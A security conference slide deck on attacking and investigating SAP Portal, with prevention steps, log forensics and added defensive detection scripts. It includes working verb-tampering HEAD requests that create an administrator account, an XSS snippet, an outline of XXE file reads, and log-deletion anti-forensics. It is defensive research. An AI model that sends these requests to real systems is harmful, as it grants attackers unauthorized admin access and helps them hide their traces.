SAP portal: breaking and forensicating
1. Invest in security to secure investments
SAP Portal: Hacking and forensics
Dmitry Chastukhin – Director of SAP pentest/research team
Evgeny Neyolov – Security analyst, (anti)forensics research

2. About ERPScan
• The only 360-degree SAP Security solution - ERPScan Security Monitoring Suite for SAP
• Leader by the number of acknowledgements from SAP (150+)
• 60+ presentations at key security conferences worldwide
• 25 awards and nominations
• Research team - 20 experts with experience in different areas of security
• Headquarters in Palo Alto (US) and Amsterdam (EU)

3. Agenda
• SAP security
• SAP forensics WTF?!
• Say hello to SAP Portal
• Breaking SAP Portal
• Catch me if you can
• Conclusion
4. SAP
• The most popular business application
• More than 180000 customers worldwide
• More than 70% of Forbes 500 run SAP
• More than 40% of ERP market in Poland

5. SAP security
Espionage
• Stealing financial information
• Stealing corporate secrets
• Stealing supplier and customer lists
• Stealing HR data
Fraud
• False transactions
• Modification of master data
Sabotage
• Denial of service
• Modification of financial reports
• Access to technology network (SCADA) by trust relations

7. Is it remotely exploitable?
5000+ non-web SAP services exposed in the world including Dispatcher, Message server, SapHostControl, etc.
sapscan.com

9. What about other services?
[Chart: number of exposed services worldwide by type: SAP Dispatcher, SAP MMC, SAP Message Server, SAP HostControl, SAP ITS Agate, SAP Message Server httpd]
10. What about unpublished threats?
• Companies are not interested in publishing information about their breaches
• There are a lot of internal breaches thanks to unnecessarily given authorizations (An employee by mistake buys hundreds of excavators instead of ten)
• There are known stories about backdoors left by developers in custom ABAP code
• How can you be sure that, if a breach occurs, you can find evidence?

11. If there are no attacks, it doesn’t mean anything
• Companies don’t like to share it
• Companies don’t use security audit ~10%
• Even if used, nobody manages it ~5%
• Even if managed, no correlation ~1%
SAP Forensics

12. Typical SAP audit options
• ICM log icm/HTTP/logging_0 70%
• Security audit log in ABAP 10%
• Table access logging rec/client 4%
• Message Server log ms/audit 2%
• SAP Gateway access log 2%
* The percentage of companies is based on our security assessments and product implementations.

13. What do we see?
• A lot of research
• Real attacks
• Lack of logging practice
• Many vulnerabilities are hard to close → We need to monitor them, at least
14. What do we need to monitor?
External attacks on SAP
* Ideally, we should control everything, but this talk has limits, so let’s focus on the most critical areas.
• Attacks on users and SAP GUI: awareness
• SAProuter: secure configuration and patch management
• Exposed SAP services: disable them
• SAP Portal and WEB:
– Too many issues and custom configuration
– Can be 0-days
– Need to concentrate on this area

15. Say hello to Portal
• Point of web access to SAP systems
• Point of web access to other corporate systems
• Way for attackers to get access to SAP from the Internet

17. Okay, okay. SAP Portal is important, and it has many links to other modules. So what?

18. SAP Logging
“If you are running an ABAP + Java installation of Web AS with SAP Web Dispatcher as a load balancing solution, you can safely disable logging of HTTP requests and responses on J2EE Engine, and use the corresponding CLF logs of SAP Web Dispatcher. This also improves the HTTP communication performance. The only drawback of using the Web Dispatcher’s CLF logs is that no information is available about the user executing the request (since the user is not authenticated on the Web Dispatcher, but on the J2EE Engine instead).”
SOURCE: SAP HELP
* Not the only…. There are many complex attacks with POST requests.
19. SAP J2EE Logging
• Categories of system events recording:
– System – all system related security and administrative logs
– Applications – all system events related to business logic
– Performance – reserved for single activity tracing
• Default location of these files in your file system:
\usr\sap\<sid>\<id>\j2ee\cluster\<node>\log

20. SAP J2EE Logging
• The developer trace files of the Java instance
<SID>\<instance name>\work
• The developer trace files of the central services
<SID>\<instance name>\work
<SID>\<instance name>\log
• Java server logs
<SID>\<instance name>\j2ee\cluster\server<n>\log

23. SAP Management Console
• SAP MMC: centralized system management
• SAP MMC has remote commands
• Commands are simple SOAP requests
• Allowing to see the trace and log messages
• It’s not bad if you only use it sometimes and delete logs after use, but…

24. SAP Management Console
What can we find in logs? Right! The file userinterface.log contains the calculated JSESSIONID.
But… The attacker must have credentials to read the log file. WRONG!
26. Prevention
LINK to SAP HELP
• Don’t use TRACE_LEVEL = 3
• Delete traces when work is finished
• Limit access to dangerous methods
• Install notes 927637 and 1439348
• Mask security-sensitive data in HTTP access log

27. Prevention
LINK to SAP HELP
• The HTTP Provider service can mask security-sensitive URL parameters, cookies, or headers
• By default, only for the headers listed below
– Path Parameter: jsessionid
– Request Parameters: j_password, j_username, j_sap_password, j_sap_again, oldPassword, confirmNewPassword, ticket
– HTTP Headers: Authorization, Cookie (JSESSIONID, MYSAPSSO2)

29. Access Control
• Web Dynpro - programmatic
• Portal iViews - programmatic
• J2EE Web apps - declarative
Programmatic: by UME
Declarative: by WEB.XML

30. Access Control
• The central entity in the J2EE authorization model is the security role
• Programmers define the application-specific roles in the J2EE deployment descriptor
web.xml
web-j2ee-engine.xml
32. Verb Tampering
• If we are trying to get access to an application using GET – we need a login:pass and administrator role
• What if we try to get access to the application using HEAD instead of GET?
• PROFIT!
• Did U know about ctc?

33. Verb Tampering
Need Admin account in SAP Portal? Just send two HEAD requests
• Create new user CONF:idence
HEAD /ctc/ConfigServlet?param=com.sap.ctc.util.UserConfig;CREATEUSER;USERNAME=CONF,PASSWORD=idence
• Add the user CONF to the group Administrators
HEAD /ctc/ConfigServlet?param=com.sap.ctc.util.UserConfig;ADD_USER_TO_GROUP;USERNAME=CONF,GROUPNAME=Administrators
* Works when UME uses JAVA database.

34. Prevention
• Install SAP notes 1503579, 1616259, 1589525, 1624450
• Install other SAP notes about Verb Tampering
• Scan applications with ERPScan WEB.XML checker
• Disable the applications that are not necessary
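As an added example (not ERPScan's WEB.XML checker and not code from the deck), the check below parses a constructed web.xml and reports every security-constraint that enumerates http-method elements, since the engine then guards only those verbs and a HEAD request falls outside the constraint; it also produces the corrected descriptor with the method lists removed. The descriptor content is constructed for the demonstration.

```python
import xml.etree.ElementTree as ET

def _local(tag):
    # Tag without namespace so DTD-based and xmlns-based web.xml both work
    return tag.rsplit("}", 1)[-1]

def _kids(elem, name):
    return [c for c in elem if _local(c.tag) == name]

def _all(root, name):
    return [e for e in root.iter() if _local(e.tag) == name]

def find_verb_gaps(web_xml):
    """Return (url-pattern, listed verbs) for every constraint that names
    specific HTTP methods: any verb NOT listed (HEAD, PUT, ...) bypasses it."""
    gaps = []
    for sc in _all(ET.fromstring(web_xml), "security-constraint"):
        for wrc in _kids(sc, "web-resource-collection"):
            verbs = [m.text.strip().upper() for m in _kids(wrc, "http-method")]
            if verbs:  # no <http-method> at all means the constraint covers all verbs
                gaps += [(p.text.strip(), verbs) for p in _kids(wrc, "url-pattern")]
    return gaps

def harden(web_xml):
    """Corrected descriptor: drop every <http-method> so constraints apply to all verbs."""
    root = ET.fromstring(web_xml)
    for wrc in _all(root, "web-resource-collection"):
        for m in _kids(wrc, "http-method"):
            wrc.remove(m)
    return ET.tostring(root, encoding="unicode")

# Constructed descriptor: /ConfigServlet is guarded for GET and POST only, /admin/* for every verb
WEAK_WEB_XML = """<web-app>
  <security-constraint>
    <web-resource-collection>
      <web-resource-name>ConfigServlet</web-resource-name>
      <url-pattern>/ConfigServlet</url-pattern>
      <http-method>GET</http-method>
      <http-method>POST</http-method>
    </web-resource-collection>
    <auth-constraint><role-name>administrators</role-name></auth-constraint>
  </security-constraint>
  <security-constraint>
    <web-resource-collection>
      <web-resource-name>Admin</web-resource-name>
      <url-pattern>/admin/*</url-pattern>
    </web-resource-collection>
    <auth-constraint><role-name>administrators</role-name></auth-constraint>
  </security-constraint>
</web-app>"""
```

find_verb_gaps(WEAK_WEB_XML) returns [('/ConfigServlet', ['GET', 'POST'])] and find_verb_gaps(harden(WEAK_WEB_XML)) returns [].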
35. Investigation
[Apr 3, 2013 1:23:59 AM ] - 192.168.192.14 : GET /ctc/ConfigServlet HTTP/1.1 401 1790
[Apr 3, 2013 1:30:01 AM ] - 192.168.192.14 : HEAD /ctc/ConfigServlet HTTP/1.1 200 0
[Apr 3, 2013 1:30:01 AM ] - 192.168.192.14 : HEAD /ctc/ConfigServlet?param=com.sap.ctc.util.UserConfig;CREATEUSER;USERNAME=CONF,PASSWORD=idence HTTP/1.0 200 0
j2ee\cluster\<node>\log\system\httpaccess\responses.trc

37. Invoker Servlet
• Want to execute an OS command on J2EE server remotely?
• Maybe upload a backdoor in a Java class?
• Or sniff all traffic?
Still remember ctc?

39. Prevention
• Update to the latest patch 1467771, 1445998
• “EnableInvokerServletGlobally” must be “false”
• Check all WEB.XML files with ERPScan WEBXML checker

42. XSS
• Many XSSs in Portal
• But sometimes HttpOnly
• But when we exploit XSS, we can use the features of SAP Portal
EPCF

43. EPCF
• EPCF provides a JavaScript API designed for the client-side communication between portal components and the portal core framework
• Enterprise Portal Client Manager (EPCM)
• iViews can access the EPCM object from every portal page or IFrame
• Every iView contains the EPCM object
<SCRIPT>
alert(EPCM.loadClientData("urn:com.sap.myObjects", "person"));
</SCRIPT>
For example, EPCF is used as a transient user data buffer for iViews
46. Web Dynpro JAVA
• Web Dynpro unauthorized modifications
• For example:
– somebody steals an account using XSS/CSRF/Sniffing
– then tries to modify the severity level of logs

48. Investigation
• No traces of change in default log files
cluster\server0\log\system\httpaccess\responses.log
• Web Dynpro sends all data by POST, and we only see GET URLs in responses.log
• But sometimes we can find information by indirect signs
[Mar 20, 2013 9:35:49 AM ] - 172.16.0.63 : GET /webdynpro/resources/sap.com/tc~lm~webadmin~log_config~wd/Components/com.sap.tc.log_configurator.LogConfigurator/warning.gif HTTP/1.1 200 110
• The client loaded images from the server during some changes

49. Investigation
• Most actions have icons
• They have to be loaded from the server
• Usually, legitimate users have them all in cache
• Attackers usually don’t have them, so they make requests to the server
• That’s how we can identify potentially malicious actions
• But there should be correlation with a real user’s activity
• False positives are possible:
– New legitimate user
– Old user clears cache
– Other
54. Breaking SAP Portal
• Found a file in the OS of SAP Portal with the encrypted passwords for administration and DB
• Found a file in the OS of SAP Portal with keys to decrypt passwords
• Found a vulnerability (another one ;)) which allows reading the files with passwords and keys
• Decrypt passwords and log into Portal
• PROFIT!

55. Read the file
How can we read the file?
• Directory Traversal
• OS Command execution
• XML External Entity (XXE)

56. XXE in Portal: Details
• Injection of malicious requests into XML packets
• Can lead to unauthorized file read, DoS, SSRF
• There is an XXE vulnerability in SAP Portal
• Can be exploited by modification of POST request
• It is possible to read any file from OS and much more

60. XXE in Portal: Result
• We can read any file
• Including config with passwords
• The SAP J2EE Engine stores the database user SAP<SID>DB; its password is here:
\usr\sap\<SID>\SYS\global\security\data\SecStore.properties
68. Investigation
• The only way to get HTTP POST request values is to enable HTTP Trace
• Visual Administrator → Dispatcher → HTTP Provider → Properties: HttpTrace = enable
• For 6.4 and 7.0 SP12 and lower:
– On Dispatcher: /j2ee/cluster/dispatcher/log/defaultTrace.trc
– On Server: j2ee\cluster\server0\log\system\httpaccess\responses.0.trc
• For 7.0 SP13 and higher: /j2ee/cluster/dispatcher/log/services/http/req_resp.trc
• Manually analyze all requests for XXE attacks
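The last step above is manual; as an added example (not from the deck) the triage below automates the first pass. It assumes the POST bodies have already been carved out of req_resp.trc, whose layout the slides do not show, and flags only the DOCTYPE constructs an XXE payload needs (external or parameter entities, external DTD subsets) while leaving ordinary internal entities alone. The three request bodies and client addresses are constructed.

```python
import re

# A DOCTYPE, with or without an internal subset in square brackets
DOCTYPE_RE = re.compile(r"<!DOCTYPE\b[^>\[]*(?:\[.*?\])?\s*>", re.S)
# <!DOCTYPE root SYSTEM "uri"> / PUBLIC "id" "uri": external DTD subset
EXT_DTD_RE = re.compile(r"<!DOCTYPE\s+[\w.:-]+\s+(?:SYSTEM|PUBLIC\s+(?:\"[^\"]*\"|'[^']*'))"
                        r"\s+(\"[^\"]*\"|'[^']*')", re.S)
# <!ENTITY [%] name SYSTEM "uri"> / PUBLIC "id" "uri": external (parameter) entity
ENTITY_RE = re.compile(r"<!ENTITY\s+(%\s*)?([\w.:-]+)\s+(?:SYSTEM|PUBLIC\s+(?:\"[^\"]*\"|'[^']*'))"
                       r"\s+(\"[^\"]*\"|'[^']*')", re.S)

def xxe_findings(body):
    """Return (kind, entity name or None, uri) for each external DTD or entity."""
    out = []
    for m in DOCTYPE_RE.finditer(body):
        doctype = m.group(0)
        ext = EXT_DTD_RE.match(doctype)
        if ext:
            out.append(("external-dtd", None, ext.group(1).strip("\"'")))
        for e in ENTITY_RE.finditer(doctype):
            kind = "parameter-entity" if e.group(1) else "external-entity"
            out.append((kind, e.group(2), e.group(3).strip("\"'")))
    return out

def triage(requests):
    """requests: iterable of (client, body) carved from the trace; keep only XXE hits."""
    hits = []
    for client, body in requests:
        findings = xxe_findings(body)
        if findings:
            hits.append((client, findings))
    return hits

# Constructed bodies: internal entity only (benign), external entity, external DTD
BENIGN = '<?xml version="1.0"?><!DOCTYPE r [<!ENTITY nbsp "&#160;">]><r>&nbsp;</r>'
FILE_READ = ('<?xml version="1.0"?><!DOCTYPE r [<!ENTITY xxe SYSTEM "file:///etc/passwd">]>'
             '<r>&xxe;</r>')
EXT_DTD = '<?xml version="1.0"?><!DOCTYPE r SYSTEM "http://example.invalid/x.dtd"><r/>'
REQUESTS = [("10.0.0.7", BENIGN), ("192.168.192.14", FILE_READ), ("192.168.192.14", EXT_DTD)]

if __name__ == "__main__":
    for client, findings in triage(REQUESTS):
        print(client, findings)
```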
69. Malicious file upload: Attack
• Knowledge management allows uploading to the server different types of files that can store malicious content
• Sometimes, if guest access is allowed, it is possible to upload any file without being an authenticated user
• For example, it can be an HTML file with JavaScript that steals cookies

72. Malicious file upload: Forensics
[Apr 10, 2013 2:26:13 AM ] - 192.168.192.22 : POST /irj/servlet/prt/portal/prteventname/HtmlbEvent/prtroot/pcd!3aportal_content!2fspecialist!2fcontentmanager!2fContentManager!2fcom.sap.km.ContentManager!2fcom.sap.km.ContentExplorer!2fcom.sap.km.ContentDocExplorer!2fcom.sap.km.DocsExplorer/documents HTTP/1.1 200 13968
[Apr 10, 2013 2:26:14 AM ] - 192.168.192.22 : GET /irj/go/km/docs/etc/public/mimes/images/html.gif HTTP/1.1 200 165
* Again, images can help us.
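An added example, not ERPScan's pattern set, that turns the indirect signs shown on slides 35, 48 and 72 (a non-GET verb accepted by /ctc/ConfigServlet, the Log Configurator's warning.gif, and html.gif fetched right after a KM document POST) into rules over the httpaccess responses log. The sample lines are the deck's own plus one constructed benign request; the line layout is assumed from those samples.

```python
import re
from datetime import datetime

# Line layout assumed from the samples on the slides
LINE_RE = re.compile(r"^\[(?P<ts>.+?)\s*\] - (?P<ip>\S+) : (?P<method>[A-Z]+) "
                     r"(?P<url>\S+) HTTP/\d\.\d (?P<status>\d{3}) (?P<size>\d+)$")

def parse(text):
    """Parse httpaccess responses lines into dicts; unparseable lines are skipped."""
    events = []
    for line in text.splitlines():
        m = LINE_RE.match(line)
        if m:
            e = m.groupdict()
            e["ts"] = datetime.strptime(e["ts"], "%b %d, %Y %I:%M:%S %p")
            e["status"] = int(e["status"])
            events.append(e)
    return events

def detect(text, window=60):
    """Return (client, tag) alerts; window = max seconds between KM POST and html.gif."""
    alerts, last_km_post = [], {}
    for e in parse(text):
        ip, url, method = e["ip"], e["url"], e["method"]
        if url.startswith("/ctc/ConfigServlet") and method != "GET" and e["status"] == 200:
            alerts.append((ip, "verb-tampering"))   # non-GET verb accepted by ctc
        if "UserConfig;CREATEUSER" in url or "ADD_USER_TO_GROUP" in url:
            alerts.append((ip, "ctc-user-mgmt"))    # user created/added via ctc URL
        if "tc~lm~webadmin~log_config~wd" in url and url.endswith(".gif"):
            alerts.append((ip, "log-config-ui"))    # Log Configurator icon fetched
        if method == "POST" and url.endswith("com.sap.km.DocsExplorer/documents"):
            last_km_post[ip] = e["ts"]               # remember KM document upload
        if url.endswith("/mimes/images/html.gif") and ip in last_km_post \
                and (e["ts"] - last_km_post[ip]).total_seconds() <= window:
            alerts.append((ip, "km-html-upload"))   # HTML file stored right after it
    return alerts

# Constructed sample: the deck's traces plus one benign portal request
SAMPLE = """\
[Apr 3, 2013 1:23:59 AM ] - 192.168.192.14 : GET /ctc/ConfigServlet HTTP/1.1 401 1790
[Apr 3, 2013 1:30:01 AM ] - 192.168.192.14 : HEAD /ctc/ConfigServlet HTTP/1.1 200 0
[Apr 3, 2013 1:30:01 AM ] - 192.168.192.14 : HEAD /ctc/ConfigServlet?param=com.sap.ctc.util.UserConfig;CREATEUSER;USERNAME=CONF,PASSWORD=idence HTTP/1.0 200 0
[Mar 20, 2013 9:35:49 AM ] - 172.16.0.63 : GET /webdynpro/resources/sap.com/tc~lm~webadmin~log_config~wd/Components/com.sap.tc.log_configurator.LogConfigurator/warning.gif HTTP/1.1 200 110
[Apr 10, 2013 2:26:13 AM ] - 192.168.192.22 : POST /irj/servlet/prt/portal/prteventname/HtmlbEvent/prtroot/pcd!3aportal_content!2fspecialist!2fcontentmanager!2fContentManager!2fcom.sap.km.ContentManager!2fcom.sap.km.ContentExplorer!2fcom.sap.km.ContentDocExplorer!2fcom.sap.km.DocsExplorer/documents HTTP/1.1 200 13968
[Apr 10, 2013 2:26:14 AM ] - 192.168.192.22 : GET /irj/go/km/docs/etc/public/mimes/images/html.gif HTTP/1.1 200 165
[Apr 10, 2013 2:30:00 AM ] - 10.0.0.5 : GET /irj/portal HTTP/1.1 200 5120
"""

if __name__ == "__main__":
    for client, tag in detect(SAMPLE):
        print(client, tag)
```

The icon rules need the correlation slide 49 asks for (a new user or a cleared cache produces the same fetches), so treat them as leads to confirm against the user's real activity, not as verdicts.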
73. Malicious file upload: Prevention
Enable File Extension and Size Filter:
• System Administration → System Configuration → Content Management → Repository → Filters → Show Advanced Options → File Extension and Size Filter
• Select either the All repositories parameter or at least one repository from the repository list in the Repositories parameter

74. Malicious file upload: Prevention
Enable Malicious Script Filter:
• System Administration → System Configuration → Content Management → Repository → Filters → Show Advanced Options → Malicious Script Filter
• The filter also detects executable scripts in files that are being modified and encodes them when they are saved
– enable Forbidden Scripts: comma-separated list of banned script tags that will be encoded when the filter is applied
– enable the Send E-Mail to Administrator option

75. Portal post-exploitation
• Lots of links to other systems in corporate LAN
• Using SSRF, attackers can get access to these systems
What is SSRF?

76. SSRF History: Basics
• We send Packet A to Service A
• Service A initiates Packet B to service B
• Services can be on the same or different hosts
• We can manipulate some fields of packet B within packet A
• Various SSRF attacks depend on how many fields we can control on packet B
[Diagram: Packet A → Service A → Packet B → Service B]
77. Partial Remote SSRF: HTTP attacks on other services
[Diagram: HTTP Server in front of the corporate network; A: direct attack, GET /vuln.jsp; B: SSRF attack, Get /vuln.jst]

78. Gopher uri scheme
• Using gopher:// uri scheme, it is possible to send TCP packets
– Exploit OS vulnerabilities
– Exploit old SAP application vulnerabilities
– Bypass SAP security restrictions
– Exploit vulnerabilities in local services
More info in our BH2012 presentation: SSRF vs. Business Critical Applications LINK

82. Anti-forensics
Log flooding
• 5 active logs
• Maximum log file size is 10 Mb
• Archiving when all logs reach the maximum size
• If file.0.log -> max size then open file.1.log
• If file.4.log -> max size then zip all and backup
• Rewriting the same files after archiving
83. Anti-forensics
Log deleting
• SAP locks write access only to the one active log
• SAP allows reading/writing logs, so it is possible to delete them
• It could compromise the attacker’s presence
Log changing
• SAP locks write access only to the one active log
• It is possible to write into any other log file
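As an added example (not from the deck), the snapshot/verify pair below applies the rotation rules of slides 82 and 83 to the "additional place for log storage" idea: only the active file is locked, so the other file.N.log files are fingerprinted and later re-checked; a log whose first line changed is reported as rotated (reused by normal rotation) rather than modified, and a roll-over of every rotated file between two checks is flagged as possible log flooding. The file names and contents are constructed.

```python
import hashlib

ROTATED = ["file.%d.log" % i for i in range(5)]   # the 5 active logs from the slide

def fingerprint(data):
    """Identify a log by its first line (it changes on rotation) plus a full hash."""
    return data.split(b"\n", 1)[0], hashlib.sha256(data).hexdigest()

def snapshot(logs, active):
    """logs: {name: bytes}. Fingerprint every rotated log except the active one,
    which SAP is still writing, so it would differ on every check anyway."""
    return {n: fingerprint(d) for n, d in logs.items() if n in ROTATED and n != active}

def verify(manifest, logs):
    """Compare a stored manifest with the current files; return (name, verdict) pairs."""
    issues = []
    for name, (head, digest) in manifest.items():
        if name not in logs:
            issues.append((name, "deleted"))
            continue
        cur_head, cur_digest = fingerprint(logs[name])
        if cur_digest != digest:
            issues.append((name, "rotated" if cur_head != head else "modified"))
    if manifest and len(issues) == len(manifest) and all(v == "rotated" for _, v in issues):
        issues.append(("*", "every rotated log replaced since last check: possible log flooding"))
    return issues

# Constructed logs: file.2.log is the one SAP currently writes (and locks)
LOGS = {n: ("[Apr 3, 2013 1:0%d:00 AM ] entry\nmore\n" % i).encode()
        for i, n in enumerate(ROTATED)}
MANIFEST = snapshot(LOGS, active="file.2.log")

def tampered_case():
    later = dict(LOGS)
    later["file.0.log"] = later["file.0.log"].replace(b"more", b"gone")  # edited rotated log
    del later["file.1.log"]                                             # deleted rotated log
    return verify(MANIFEST, later)

def flooded_case():
    # Every file rolled over (fresh first lines), as after enough requests to fill all five
    later = {n: ("[Apr 3, 2013 5:0%d:00 AM ] entry\n" % i).encode() for i, n in enumerate(ROTATED)}
    return verify(MANIFEST, later)
```

The manifest has to live off the Portal host, since an attacker who can rewrite the rotated logs could also rewrite a manifest stored beside them.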
84. Securing SAP Portal
• Patching
• Secure configuration
• Enabling HTTP Trace with masking
• Malicious script filter
• Log archiving
• Additional place for log storage
• Monitoring of security events
– Own scripts, parse common patterns
– ERPScan has all existing web vulns/0-day patterns

85. Conclusion
It is possible to protect yourself from these kinds of issues, and we are working closely with SAP to keep customers secure.
It’s all in your hands:
• SAP guides
• Regular security assessments
• ABAP code review
• Monitoring technical security
• Segregation of duties

86. Future work
I'd like to thank SAP's Product Security Response Team for the great cooperation to make SAP systems more secure.
Research is always ongoing, and we can't share all of it today. If you want to be the first to see new attacks and demos, follow us at @erpscan and attend future presentations:
July 31 – BlackHat (Las Vegas, USA)